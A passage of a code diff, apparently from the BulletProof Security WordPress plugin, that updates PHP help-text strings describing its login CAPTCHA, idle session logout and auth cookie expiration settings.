on the Login Form.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form CAPTCHA Error message (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('The Default JTC Comment Form CAPTCHA error message is: <strong>ERROR</strong>: Incorrect JTC CAPTCHA Entered. Click your Browser\'s back button and re-enter the JTC CAPTCHA. You can change or add to the default error message. This error message only applies to the Comment Form CAPTCHA error message and does not affect or change any of the other Form CAPTCHA error messages.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form: CSS Styling (BPS Pro Only)', 'bulletproof-security').'</strong><br>'.__('You can position the JTC Title|Text Form label and the JTC CAPTCHA Form Input text box by editing the CSS in these text boxes. By default the position of the JTC Title|Text label and the JTC CAPTCHA Form Input text box is below your Comment Form submit button. For CSS code styling examples.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form Label (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('This is the JTC Title|Text label above the Form Input text box.', 'bulletproof-security').'<br><strong>'.__('Comment Form Input Text Box (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('This is the JTC CAPTCHA Form Input text box.', 'bulletproof-security').'<br><br><strong>'.__('Additional Brute Force CAPTCHA Option: ', 'bulletproof-security').'</strong><br>'.__('If you do not allow anyone else to log into your website then here is an example of how JTC could be used as an additional Brute Force Login Protection feature.', 'bulletproof-security').'<br><br>'.__('Example: You create a JTC CAPTCHA: My Example CAPTCHA, you either leave the JTC ToolTip: text box blank or you create a Hint for yourself - JTC ToolTip: My Example Hint. If your JTC ToolTip: text box is blank then the CAPTCHA will not be displayed - only you will know what the CAPTCHA is. If you create a personal Hint for yourself then only you will know what the answer to the Hint is.', 'bulletproof-security').'</strong>';
20
 
21
  /** Idle Session Logout|Auth Cookie Expiration **/
22
  $bps_modal_content3 = '<strong>'.__('Idle Session Logout (ISL) General Info:', 'bulletproof-security').'</strong><br>'.__('Idle Session Logout (ISL) can be considered a "soft" setting vs ACE being a "hard" setting. ISL uses javascript Event Listeners to monitor Users activity for these ISL events: keyboard key is pressed, mouse button is pressed, mouse is moved, mouse wheel is rolled up or down, finger is placed on the touch surface/screen and finger already placed on the screen is moved across the screen.', 'bulletproof-security').'<br><br>'.__('If you set the Idle Session Logout Time to 60 minutes and the User is idle/inactive for 10 minutes and becomes active again then the Idle Session Logout Time starts all over again/is reset to 60 minutes. If a User is idle/inactive for 60 continuous minutes then that User will be automatically logged out of the site and redirected to the BPS Idle Session Logout Page.', 'bulletproof-security').'<br><br>'.__('When an idle/inactive User is logged out of the site they are redirected to the BPS Idle Session Logout Page URL if their Browser is still open. If the User\'s Browser is still open and the User is on another Browser tab window then the Browser tab window where they are logged into your site will be redirected to the BPS Idle Session Logout Page URL. If the User has closed their Browser without logging out of your site then that User will not be logged out of your site. You can use ACE to log User\'s out of your site whether or not they have closed their Browser. Idle Session Logouts are logged in the BPS Security Log file.', 'bulletproof-security').'<br><br><strong><font color="blue">'.__('After making any option setting changes click the Save Options button to save your new option settings. To reset ISL option settings back to the default ISL option settings, delete any custom values/entries you have entered in any text/textarea boxes and click the Save Options button.', 'bulletproof-security').'</font></strong><br><br><strong>'.__('Turn On|Turn Off:', 'bulletproof-security').'</strong><br>'.__('ISL is Turned Off by default. Select ISL On to turn ISL On. Select ISL Off to turn ISL Off.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when an idle/inactive User should be logged out of your site. Example: Entering 60 will automatically logout Users who have been idle/inactive for 60 continuous minutes. Only enter numbers and not any other characters. If you accidently enter a blank value for the Idle Session Logout Time then ISL will be disabled automatically.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page URL:', 'bulletproof-security').'</strong><br>'.__('When an idle/inactive User is logged out of your site they are redirected to the BPS Idle Session Logout Page URL by default. You can choose to redirect logged out users to any URL that you want to redirect them to by entering the URL in this text box. Example: If you enter the URL path to your WP Login page then user\'s will be redirected to your WP Login page instead of the default BPS Idle Session Logout Page.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Login URL:', 'bulletproof-security').'</strong><br>'.__('This option displays a clickable Login URL/link to your WP Login page. If your Login page URL is different than the default URL that you see displayed in the Idle Session Logout Page Login URL text box then change the URL to the URL for your site\'s Login page. You can choose not to display a Login URL/link by entering "No" (without quotes) if you do not want a Login URL/link displayed.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Exclude URLs|URIs:', 'bulletproof-security').'</strong><br>'.__('This option allows you to exclude any pages or posts that you do not want ISL to check/monitor. Important: The URI path is everything after the root portion or your domain URL. Example: If the page/post you want to exclude is here: www.example.com/some-post/ then the URI Exclusion that you would use/enter is: /some-post/. If the page/post you want to exclude is here: www.example.com/category/some-post/ then the URI Exclusion that you would use/enter is: /category/some-post/.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Custom Message:', 'bulletproof-security').'</strong><br>'.__('You can either use the default BPS ISL message/text by leaving the textarea box blank or you can enter your own custom ISL message/text in this textarea box that you want displayed to logged out users. Your custom message will be displayed on the default BPS ISL Logout page unless you choose to redirect users to a different URL/link using the Idle Session Logout Page URL option setting.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Custom CSS Style:', 'bulletproof-security').'</strong><br>'.__('You can either use the default BPS CSS Style code or enter your own custom CSS Style customizations.', 'bulletproof-security').'<br><br><strong>'.__('User Account Exceptions:', 'bulletproof-security').'</strong><br>'.__('To create exceptions for User Account names enter User Account names (case-insensitive) separated by a comma and a space: johnDoe, janeDoe. ISL will be turned Off/disabled for any User Account names that you add in this text box. User Account Exceptions override the User Roles option setting. Example: If johnDoe is an Administrator and you have enabled ISL for the Administrator User Role and you have added johnDoe in the User Account Exceptions text box then the johnDoe User Account Exception will override the Administrator User Role option setting and ISL will still be disabled for the johnDoe User Account. It is recommended that you add your User Account name, but if you also want to be automatically logged out when your User Account is idle/inactive then do not add your User Account name.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Idle Session Logouts For These User Roles:', 'bulletproof-security').'</strong><br>'.__('Checking a User Role checkbox will enable ISL for all Users with that User Role (See User Account Exceptions). Unchecking a User Role checkbox will disable ISL for all Users with that User Role. Example: If you only check the Subscriber checkbox then ISL will only be enabled for Users that are Subscribers. If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Idle Session Logouts For TinyMCE Editors:', 'bulletproof-security').'</strong><br>'.__('Please read all of the TinyMCE Editor Important Notes below. Checking the Enable|Disable ISL For TinyMCE Editor checkbox will disable ISL for any/all pages that have a TinyMCE Editor on them.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor Important Notes:', 'bulletproof-security').'</strong><br><br><strong>'.__('ISL and TinyMCE javascript Event Listeners:', 'bulletproof-security').'</strong><br>'.__('ISL uses javascript Event Listeners to monitor User activity for these ISL events: keyboard key is pressed, mouse button is pressed, mouse is moved, mouse wheel is rolled up or down, finger is placed on the touch surface/screen and finger already placed on the screen is moved across the screen. The TinyMCE Editor also uses javascript Event Listeners in the Visual Editor window. ISL can monitor User activity in the Text tab Editor window and the Editor Toolbar buttons or menus for any of the ISL events listed above, but cannot monitor any User activity in the TinyMCE Visual tab Editor window.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor on WordPress Post, Page and Comments pages:', 'bulletproof-security').'</strong><br>'.__('This example is using an Idle Session Logout Time of 60 minutes. If the User is typing content/text for 60 continuous minutes in the WordPress Post, Page or Comments TinyMCE Visual Editor window and has not clicked or moved their mouse outside of the TinyMCE Visual Editor window for 60 continuous minutes and the Enable|Disable ISL For TinyMCE Editor checkbox option is not checked to disable ISL for TinyMCE Editors, then the User will see the native WP Confirm Navigation alert popup window with buttons to either Leave this Page or Stay on this Page. Clicking the Stay on this Page button resets the ISL timer again to 60 minutes and the User will not lose any of their content/text.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor Instances used in other plugins and themes:', 'bulletproof-security').'</strong><br>'.__('If another plugin or theme is using instances of the TinyMCE Editor, like BPS Maintenance Mode MMode Editor TinyMCE Editor instance for example, then if all of the same conditions stated above for the WordPress Post, Page and Comments pages TinyMCE Visual Editor are the same then instead of seeing the native WP Confirm Navigation alert popup window, the User will be logged out automatically and the User\'s content/text will not be saved. If you are using TinyMCE Editor Instances in another plugin or theme that Users can use to add/edit content/text and you do not want to risk a User being logged out and losing any of their content/text then check the Enable|Disable ISL For TinyMCE Editor checkbox to disable ISL on any pages that contain a TinyMCE Editor Instance.', 'bulletproof-security').'<br><br><strong>'.__('Auth Cookie Expiration (ACE) General Info:', 'bulletproof-security').'</strong><br>'.__('The WordPress Authentication Cookie Expiration (ACE) time can be considered a "hard" setting vs ISL being a "soft" setting. If you set the Cookie Expiration to 60 minutes then 60 consecutive minutes after a User has logged in, that user will be logged out automatically whether that User is idle/inactive or not. The WordPress Authentication Cookie Expiration (ACE) time is set when a User logs in. The default WordPress Authentication Cookie Expiration time is 2880 Minutes/2 Days and 20160 Minutes/14 Days if a User checks the Remember Me checkbox when they login. The WordPress Authentication Cookie Expiration time is set/reset each time a User logs in. So if a User logs out and then logs back into the site then the Cookie Expiration time for that User is set again to whatever Auth Cookie Expiration Time that you choose or the WordPress default Cookie Expiration time if you do not use or turn On ACE.', 'bulletproof-security').'<br><br><strong>'.__('Turn On|Turn Off:', 'bulletproof-security').'</strong><br>'.__('ACE is Turned Off by default. Select ACE On to turn ACE On. Select ACE Off to turn ACE Off.', 'bulletproof-security').'<br><br><strong>'.__('Auth Cookie Expiration Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when a User should be logged out of your site. Example: Entering 720 will automatically logout Users who have been logged in for 720 consecutive minutes/12 hours. Only enter numbers and not any other characters. If you accidently enter a blank value for the for Auth Cookie Expiration Time or Remember Me Auth Cookie Expiration Time then ACE will use the default WordPress Authentication Cookie Expiration time.', 'bulletproof-security').'<br><br><strong>'.__('Remember Me Auth Cookie Expiration Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when a User should be logged out of your site when the User has checked the Remember Me checkbox on the WordPress Login page. Example: Entering 720 will automatically logout Users who have been logged in for 720 consecutive minutes/12 hours. Only enter numbers and not any other characters. If you accidently enter a blank value for the for Auth Cookie Expiration Time or Remember Me Auth Cookie Expiration Time then ACE will use the default WordPress Authentication Cookie Expiration time.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Remember Me Checkbox:', 'bulletproof-security').'</strong><br>'.__('Checking the Disable & do not display the Remember Me checkbox option will disable and not display the Remember Me checkbox for everyone including you. If you want to set and control the WordPress Remember Me setting then use the Remember Me Auth Cookie Expiration Time in Minutes option setting instead and choose an amount of time you would like to use for the Cookie expiration time.', 'bulletproof-security').'<br><br><strong>'.__('User Account Exceptions:', 'bulletproof-security').'</strong><br>'.__('To create exceptions for User Account names enter User Account names (case-insensitive) separated by a comma and a space: johnDoe, janeDoe. Auth Cookie Expiration Time settings will not be applied to any User Account names that you add in this text box and these User Accounts will instead use the default WordPress Authentication Cookie Expiration time. User Account Exceptions override the User Roles option setting. Example: If johnDoe is an Administrator and you have enabled ACE for the Administrator User Role and you have added johnDoe in the User Account Exceptions text box then the johnDoe User Account Exception will override the Administrator User Role option setting and the johnDoe User Account will use the default WordPress Authentication Cookie Expiration time. It is recommended that you add your User Account name, but if you also want to be automatically logged out for the Auth Cookie Expiration time that you choose then do not add your User Account name.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Auth Cookie Expiration Time For These User Roles:', 'bulletproof-security').'</strong><br>'.__('Checking a User Role checkbox will apply the Auth Cookie Expiration Time that you choose for all Users with that User Role (See User Account Exceptions). Unchecking a User Role checkbox will apply the default WordPress Authentication Cookie Expiration time for all Users with that User Role. Example: If you only check the Subscriber checkbox then ACE will only apply the Auth Cookie Expiration Time setting that you choose for Users that are Subscribers. If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br>';
16
  }
17
 
18
  /** JTC-Lite stripped down version of the BEAST - BPS Pro JTC Anti-Spam|Anti-Hacker **/
19
+ $bps_modal_content2 = '<strong>'.__('If you forget what the CAPTCHA is and cannot login to your website use FTP or your web host control panel file manager and rename the /bulletproof-security/ plugin folder name to /_bulletproof-security/. Login to your website, go to the BPS JTC-Lite page and correct the CAPTCHA issue/problem. Rename the /_bulletproof-security/ plugin folder name back to /bulletproof-security/.', 'bulletproof-security').'</strong><br><br><strong>'.__('JTC-Lite Manual Setup Steps', 'bulletproof-security').'</strong><br>'.__('1. Enter a user friendly CAPTCHA in the JTC CAPTCHA text box.', 'bulletproof-security').'<br>'.__('2. Copy and paste the CAPTCHA you entered in the JTC CAPTCHA text box into the JTC ToolTip text box.', 'bulletproof-security').'<br>'.__('3. Either keep this default text "Hover or click the text box below" that will be displayed on all your forms or edit this text and add the message you want to add.', 'bulletproof-security').'<br>'.__('4. Check the Login Form checkbox and click the Save Options button.', 'bulletproof-security').'<br><br><strong>'.__('General Info about JTC-Lite', 'bulletproof-security').'</strong><br>'.__('JTC-Lite protects the WordPress Login form against automated SpamBot and HackerBot Brute Force Login attacks. Prevents User Accounts from being locked repeatedly by constant Brute Force Login attacks on your Login page. If you would like to protect all of your WordPress forms get the full version of JTC - BPS Pro JTC Anti-Spam|Anti-Hacker.', 'bulletproof-security').'<br><br><strong>'.__('JTC CAPTCHA: ', 'bulletproof-security').'</strong><br>'.__('This is the CAPTCHA that users will enter to Login to your website. You can use any numbers or characters and spaces in the CAPTCHA. You can even use HTML code characters except for these HTML code characters: < > \' " &. You can use a phrase for the CAPTCHA or it can be a single word or you can use your own original combination of words, numbers and HTML characters.', 'bulletproof-security').'<br><br><strong>'.__('Note: ', 'bulletproof-security').'</strong>'.__('It is recommended that you make your CAPTCHA user friendly, simple, clear and easy to understand for your users.', 'bulletproof-security').'<br><br><strong>'.__('JTC ToolTip: ', 'bulletproof-security').'</strong><br>'.__('This is the jQuery ToolTip message that is displayed to users when they hover or click on the CAPTCHA text box. This is where you will tell your users what they need to enter for the CAPTCHA. It can be a phrase, complete this sentence, a Hint or simply just Type/Enter: xxxxx or you can get as creative as you want to get with your jQuery ToolTip. Randomness is what makes a CAPTCHA very effective. JTC is designed with CAPTCHA randomness capability as one of its primary features.', 'bulletproof-security').'<br><br><strong>'.__('JTC Title|Text: ', 'bulletproof-security').'</strong><br>'.__('This is the text that is displayed to users above the CAPTCHA text box/Form Field.', 'bulletproof-security').$networkMUJTCText.'<br><br><strong>'.__('Enable JTC for WooCommerce (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('Check this checkbox if you have the WooCommerce plugin installed if you would like to use BPS JTC on the WooCommerce custom login page. BPS JTC will still continue to work normally on the standard WordPress Forms: Login, Register, Lost Password, Comment, Multisite Register, BuddyPress Register and BuddyPress Sidebar Login Forms when you check this checkbox. This checkbox option setting is not for turning JTC On or Off if you are using WooCommerce. Use the JTC Enable|Disable JTC For These Forms option checkboxes to enable or disable JTC on each of your Forms.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable JTC For These Forms (Only the Login Form CAPTCHA is available in BPS Free): ', 'bulletproof-security').'</strong><br>'.__('Checking a Form checkbox will display a CAPTCHA on that Form to all users. Unchecking a Form checkbox will remove the CAPTCHA on that Form for all users. The Comment Form is a special case and the CAPTCHA can be displayed based on the User Roles that you choose. See the Comment Form help section below.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form: (only applies if Comment Form CAPTCHA is enabled/checked) ', 'bulletproof-security').'<br>'.__('Enable|Disable JTC For These Registered/Logged In User Roles (BPS Pro Only:', 'bulletproof-security').'</strong><br>'.__('Users must be logged into your website for the Comment Form User Roles to work. If you do not require that users are registered and logged in to post comments on your website then these JTC options will not have any effect. These options are only for registered and logged in users and only for your Comment Form if you are using this WordPress Discussion setting: Users must be registered and logged in to comment. If you do not want to require that users are registered and logged in to comment then the JTC Comment Form CAPTCHA will still work as long as you have this WordPress Discussion setting checked: Comment author must fill out name and email.', 'bulletproof-security').'<br><br>'.__('Checking a User Role checkbox will display a CAPTCHA to all users with that User Role on your website\'s Comment Form. Unchecking a User Role checkbox will remove the CAPTCHA from displaying to users with that User Role on your website\'s Comment Form. If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br><strong>'.__('Login Form: CAPTCHA Error message:', 'bulletproof-security').'</strong><br>'.__('The Default JTC Form CAPTCHA error message is: <strong>ERROR</strong>: Incorrect JTC CAPTCHA Entered. You can change or add to the default error message. This error message is displayed on the Login Form.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form CAPTCHA Error message (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('The Default JTC Comment Form CAPTCHA error message is: <strong>ERROR</strong>: Incorrect JTC CAPTCHA Entered. Click your Browser\'s back button and re-enter the JTC CAPTCHA. You can change or add to the default error message. This error message only applies to the Comment Form CAPTCHA error message and does not affect or change any of the other Form CAPTCHA error messages.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form: CSS Styling (BPS Pro Only)', 'bulletproof-security').'</strong><br>'.__('You can position the JTC Title|Text Form label and the JTC CAPTCHA Form Input text box by editing the CSS in these text boxes. By default the position of the JTC Title|Text label and the JTC CAPTCHA Form Input text box is below your Comment Form submit button. For CSS code styling examples.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form Label (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('This is the JTC Title|Text label above the Form Input text box.', 'bulletproof-security').'<br><strong>'.__('Comment Form Input Text Box (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('This is the JTC CAPTCHA Form Input text box.', 'bulletproof-security').'<br><br><strong>'.__('Additional Brute Force CAPTCHA Option: ', 'bulletproof-security').'</strong><br>'.__('If you do not allow anyone else to log into your website then here is an example of how JTC could be used as an additional Brute Force Login Protection feature.', 'bulletproof-security').'<br><br>'.__('Example: You create a JTC CAPTCHA: My Example CAPTCHA, you either leave the JTC ToolTip: text box blank or you create a Hint for yourself - JTC ToolTip: My Example Hint. If your JTC ToolTip: text box is blank then the CAPTCHA will not be displayed - only you will know what the CAPTCHA is. If you create a personal Hint for yourself then only you will know what the answer to the Hint is.', 'bulletproof-security').'</strong>';
20
 
21
  /** Idle Session Logout|Auth Cookie Expiration **/
22
  $bps_modal_content3 = '<strong>'.__('Idle Session Logout (ISL) General Info:', 'bulletproof-security').'</strong><br>'.__('Idle Session Logout (ISL) can be considered a "soft" setting vs ACE being a "hard" setting. ISL uses javascript Event Listeners to monitor Users activity for these ISL events: keyboard key is pressed, mouse button is pressed, mouse is moved, mouse wheel is rolled up or down, finger is placed on the touch surface/screen and finger already placed on the screen is moved across the screen.', 'bulletproof-security').'<br><br>'.__('If you set the Idle Session Logout Time to 60 minutes and the User is idle/inactive for 10 minutes and becomes active again then the Idle Session Logout Time starts all over again/is reset to 60 minutes. If a User is idle/inactive for 60 continuous minutes then that User will be automatically logged out of the site and redirected to the BPS Idle Session Logout Page.', 'bulletproof-security').'<br><br>'.__('When an idle/inactive User is logged out of the site they are redirected to the BPS Idle Session Logout Page URL if their Browser is still open. If the User\'s Browser is still open and the User is on another Browser tab window then the Browser tab window where they are logged into your site will be redirected to the BPS Idle Session Logout Page URL. If the User has closed their Browser without logging out of your site then that User will not be logged out of your site. You can use ACE to log User\'s out of your site whether or not they have closed their Browser. Idle Session Logouts are logged in the BPS Security Log file.', 'bulletproof-security').'<br><br><strong><font color="blue">'.__('After making any option setting changes click the Save Options button to save your new option settings. To reset ISL option settings back to the default ISL option settings, delete any custom values/entries you have entered in any text/textarea boxes and click the Save Options button.', 'bulletproof-security').'</font></strong><br><br><strong>'.__('Turn On|Turn Off:', 'bulletproof-security').'</strong><br>'.__('ISL is Turned Off by default. Select ISL On to turn ISL On. Select ISL Off to turn ISL Off.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when an idle/inactive User should be logged out of your site. Example: Entering 60 will automatically logout Users who have been idle/inactive for 60 continuous minutes. Only enter numbers and not any other characters. If you accidently enter a blank value for the Idle Session Logout Time then ISL will be disabled automatically.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page URL:', 'bulletproof-security').'</strong><br>'.__('When an idle/inactive User is logged out of your site they are redirected to the BPS Idle Session Logout Page URL by default. You can choose to redirect logged out users to any URL that you want to redirect them to by entering the URL in this text box. Example: If you enter the URL path to your WP Login page then user\'s will be redirected to your WP Login page instead of the default BPS Idle Session Logout Page.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Login URL:', 'bulletproof-security').'</strong><br>'.__('This option displays a clickable Login URL/link to your WP Login page. If your Login page URL is different than the default URL that you see displayed in the Idle Session Logout Page Login URL text box then change the URL to the URL for your site\'s Login page. You can choose not to display a Login URL/link by entering "No" (without quotes) if you do not want a Login URL/link displayed.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Exclude URLs|URIs:', 'bulletproof-security').'</strong><br>'.__('This option allows you to exclude any pages or posts that you do not want ISL to check/monitor. Important: The URI path is everything after the root portion or your domain URL. Example: If the page/post you want to exclude is here: www.example.com/some-post/ then the URI Exclusion that you would use/enter is: /some-post/. If the page/post you want to exclude is here: www.example.com/category/some-post/ then the URI Exclusion that you would use/enter is: /category/some-post/.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Custom Message:', 'bulletproof-security').'</strong><br>'.__('You can either use the default BPS ISL message/text by leaving the textarea box blank or you can enter your own custom ISL message/text in this textarea box that you want displayed to logged out users. Your custom message will be displayed on the default BPS ISL Logout page unless you choose to redirect users to a different URL/link using the Idle Session Logout Page URL option setting.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Custom CSS Style:', 'bulletproof-security').'</strong><br>'.__('You can either use the default BPS CSS Style code or enter your own custom CSS Style customizations.', 'bulletproof-security').'<br><br><strong>'.__('User Account Exceptions:', 'bulletproof-security').'</strong><br>'.__('To create exceptions for User Account names enter User Account names (case-insensitive) separated by a comma and a space: johnDoe, janeDoe. ISL will be turned Off/disabled for any User Account names that you add in this text box. User Account Exceptions override the User Roles option setting. Example: If johnDoe is an Administrator and you have enabled ISL for the Administrator User Role and you have added johnDoe in the User Account Exceptions text box then the johnDoe User Account Exception will override the Administrator User Role option setting and ISL will still be disabled for the johnDoe User Account. It is recommended that you add your User Account name, but if you also want to be automatically logged out when your User Account is idle/inactive then do not add your User Account name.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Idle Session Logouts For These User Roles:', 'bulletproof-security').'</strong><br>'.__('Checking a User Role checkbox will enable ISL for all Users with that User Role (See User Account Exceptions). Unchecking a User Role checkbox will disable ISL for all Users with that User Role. Example: If you only check the Subscriber checkbox then ISL will only be enabled for Users that are Subscribers. If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Idle Session Logouts For TinyMCE Editors:', 'bulletproof-security').'</strong><br>'.__('Please read all of the TinyMCE Editor Important Notes below. Checking the Enable|Disable ISL For TinyMCE Editor checkbox will disable ISL for any/all pages that have a TinyMCE Editor on them.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor Important Notes:', 'bulletproof-security').'</strong><br><br><strong>'.__('ISL and TinyMCE javascript Event Listeners:', 'bulletproof-security').'</strong><br>'.__('ISL uses javascript Event Listeners to monitor User activity for these ISL events: keyboard key is pressed, mouse button is pressed, mouse is moved, mouse wheel is rolled up or down, finger is placed on the touch surface/screen and finger already placed on the screen is moved across the screen. The TinyMCE Editor also uses javascript Event Listeners in the Visual Editor window. ISL can monitor User activity in the Text tab Editor window and the Editor Toolbar buttons or menus for any of the ISL events listed above, but cannot monitor any User activity in the TinyMCE Visual tab Editor window.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor on WordPress Post, Page and Comments pages:', 'bulletproof-security').'</strong><br>'.__('This example is using an Idle Session Logout Time of 60 minutes. If the User is typing content/text for 60 continuous minutes in the WordPress Post, Page or Comments TinyMCE Visual Editor window and has not clicked or moved their mouse outside of the TinyMCE Visual Editor window for 60 continuous minutes and the Enable|Disable ISL For TinyMCE Editor checkbox option is not checked to disable ISL for TinyMCE Editors, then the User will see the native WP Confirm Navigation alert popup window with buttons to either Leave this Page or Stay on this Page. Clicking the Stay on this Page button resets the ISL timer again to 60 minutes and the User will not lose any of their content/text.', 'bulletproof-security').'<br><br><strong>'.__('TinyMCE Editor Instances used in other plugins and themes:', 'bulletproof-security').'</strong><br>'.__('If another plugin or theme is using instances of the TinyMCE Editor, like BPS Maintenance Mode MMode Editor TinyMCE Editor instance for example, then if all of the same conditions stated above for the WordPress Post, Page and Comments pages TinyMCE Visual Editor are the same then instead of seeing the native WP Confirm Navigation alert popup window, the User will be logged out automatically and the User\'s content/text will not be saved. If you are using TinyMCE Editor Instances in another plugin or theme that Users can use to add/edit content/text and you do not want to risk a User being logged out and losing any of their content/text then check the Enable|Disable ISL For TinyMCE Editor checkbox to disable ISL on any pages that contain a TinyMCE Editor Instance.', 'bulletproof-security').'<br><br><strong>'.__('Auth Cookie Expiration (ACE) General Info:', 'bulletproof-security').'</strong><br>'.__('The WordPress Authentication Cookie Expiration (ACE) time can be considered a "hard" setting vs ISL being a "soft" setting. If you set the Cookie Expiration to 60 minutes then 60 consecutive minutes after a User has logged in, that user will be logged out automatically whether that User is idle/inactive or not. The WordPress Authentication Cookie Expiration (ACE) time is set when a User logs in. The default WordPress Authentication Cookie Expiration time is 2880 Minutes/2 Days and 20160 Minutes/14 Days if a User checks the Remember Me checkbox when they login. The WordPress Authentication Cookie Expiration time is set/reset each time a User logs in. So if a User logs out and then logs back into the site then the Cookie Expiration time for that User is set again to whatever Auth Cookie Expiration Time that you choose or the WordPress default Cookie Expiration time if you do not use or turn On ACE.', 'bulletproof-security').'<br><br><strong>'.__('Turn On|Turn Off:', 'bulletproof-security').'</strong><br>'.__('ACE is Turned Off by default. Select ACE On to turn ACE On. Select ACE Off to turn ACE Off.', 'bulletproof-security').'<br><br><strong>'.__('Auth Cookie Expiration Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when a User should be logged out of your site. Example: Entering 720 will automatically logout Users who have been logged in for 720 consecutive minutes/12 hours. Only enter numbers and not any other characters. If you accidently enter a blank value for the for Auth Cookie Expiration Time or Remember Me Auth Cookie Expiration Time then ACE will use the default WordPress Authentication Cookie Expiration time.', 'bulletproof-security').'<br><br><strong>'.__('Remember Me Auth Cookie Expiration Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when a User should be logged out of your site when the User has checked the Remember Me checkbox on the WordPress Login page. Example: Entering 720 will automatically logout Users who have been logged in for 720 consecutive minutes/12 hours. Only enter numbers and not any other characters. If you accidently enter a blank value for the for Auth Cookie Expiration Time or Remember Me Auth Cookie Expiration Time then ACE will use the default WordPress Authentication Cookie Expiration time.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Remember Me Checkbox:', 'bulletproof-security').'</strong><br>'.__('Checking the Disable & do not display the Remember Me checkbox option will disable and not display the Remember Me checkbox for everyone including you. If you want to set and control the WordPress Remember Me setting then use the Remember Me Auth Cookie Expiration Time in Minutes option setting instead and choose an amount of time you would like to use for the Cookie expiration time.', 'bulletproof-security').'<br><br><strong>'.__('User Account Exceptions:', 'bulletproof-security').'</strong><br>'.__('To create exceptions for User Account names enter User Account names (case-insensitive) separated by a comma and a space: johnDoe, janeDoe. Auth Cookie Expiration Time settings will not be applied to any User Account names that you add in this text box and these User Accounts will instead use the default WordPress Authentication Cookie Expiration time. User Account Exceptions override the User Roles option setting. Example: If johnDoe is an Administrator and you have enabled ACE for the Administrator User Role and you have added johnDoe in the User Account Exceptions text box then the johnDoe User Account Exception will override the Administrator User Role option setting and the johnDoe User Account will use the default WordPress Authentication Cookie Expiration time. It is recommended that you add your User Account name, but if you also want to be automatically logged out for the Auth Cookie Expiration time that you choose then do not add your User Account name.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Auth Cookie Expiration Time For These User Roles:', 'bulletproof-security').'</strong><br>'.__('Checking a User Role checkbox will apply the Auth Cookie Expiration Time that you choose for all Users with that User Role (See User Account Exceptions). Unchecking a User Role checkbox will apply the default WordPress Authentication Cookie Expiration time for all Users with that User Role. Example: If you only check the Subscriber checkbox then ACE will only apply the Auth Cookie Expiration Time setting that you choose for Users that are Subscribers. If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br>';
admin/maintenance/maintenance.php CHANGED
@@ -150,6 +150,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
150
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
151
  // Replace ABSPATH = wp-content
152
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
 
153
  // Top div echo & bottom div echo
154
